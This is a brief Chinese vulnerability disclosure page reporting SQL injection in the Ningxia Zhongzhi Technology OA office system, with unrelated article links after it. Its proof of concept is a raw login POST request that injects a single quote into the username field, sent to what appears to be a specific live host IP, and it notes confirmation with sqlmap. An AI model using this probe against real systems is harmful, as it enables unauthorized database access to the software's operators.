宁夏众智科技OA办公系统存在SQL注入漏洞

漏洞描述

宁夏众智科技OA办公系统存在SQL注入漏洞

漏洞复现

POC

复制代码
POST /Account/Login?ACT=Index&CLR=Home HTTP/1.1
Host: 
Content-Length: 45
Cache-Control: max-age=0
Origin: http://39.105.48.206
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.105.48.206/Account/Login?ACT=Index&CLR=Home
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive

username=admin%27&password=1&RememberMe=false

bp报错500

sqlmap确认漏洞

相关推荐
泷羽Sec-静安1 小时前
Less-1 GET-Error based-Single quotes-String GET-基于错误-单引号-字符串
前端·css·网络·sql·安全·web安全·less
亲爱的数据1 小时前
嵌入模型:文本“已死”,多模态尚有红利,2025Q4科技观察
科技
乌托邦的逃亡者3 小时前
Linux系统中配置history命令显示时间、IP、账号和操作命令
linux·运维·安全
smart19984 小时前
电脑备份、服务器备份、云备份、Veeam备份,选哪种存储设备?
网络·科技·电脑
Axis tech6 小时前
德国莱茵金属公司使用Varjo XR-4创建虚拟现实培训解决方案
科技
belldeep7 小时前
网络安全:FOFA , Hunter 是什么?
网络·安全·fofa·hunter
腾视科技9 小时前
安全驾驶 智在掌控|腾视科技ES06终端,为车辆运营赋能
大数据·人工智能·科技·安全·大模型
cliproxydaili9 小时前
Cliproxy与Adspower指纹浏览器:跨境业务安全与效率的双重引擎
运维·服务器·安全
zandy10119 小时前
2025企业级智能体平台架构拆解: 如何安全合规下构筑强大的护城河
大数据·安全·架构·智能体